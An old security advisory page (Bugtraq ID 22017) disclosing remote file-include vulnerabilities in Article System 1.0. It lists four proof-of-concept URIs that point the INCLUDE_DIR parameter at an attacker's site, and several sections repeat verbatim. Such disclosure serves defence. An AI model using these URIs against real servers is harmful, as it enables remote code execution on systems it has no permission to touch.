Article System Multiple Remote File Include Vulnerabilities
BID:22017
Info
Article System Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 22017 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 11 2007 12:00AM |
| Updated: | Jan 12 2007 05:20PM |
| Credit: | Dr Max Virus is credited with the discovery of this vulnerability. |
| Vulnerable: |
Article System Article System 1.0 |
| Not Vulnerable: | |
Discussion
Article System Multiple Remote File Include Vulnerabilities
Article System is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Article System 1.0 is vulnerable to this issue.
Article System is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Article System 1.0 is vulnerable to this issue.
Exploit / POC
Article System Multiple Remote File Include Vulnerabilities
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://example.com/[script_path]/include/forms.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/issue_edit.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/client.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/classes.php?INCLUDE_DIR=attacker's site
An attacker may exploit these issues using a web client.
The following proof-of-concept URIs are available:
http://example.com/[script_path]/include/forms.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/issue_edit.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/client.php?INCLUDE_DIR=attacker's site
http://example.com/[script_path]/include/classes.php?INCLUDE_DIR=attacker's site
Solution / Fix
Article System Multiple Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
Article System Multiple Remote File Include Vulnerabilities
References:
References:
- Vendor Homepage (Article System)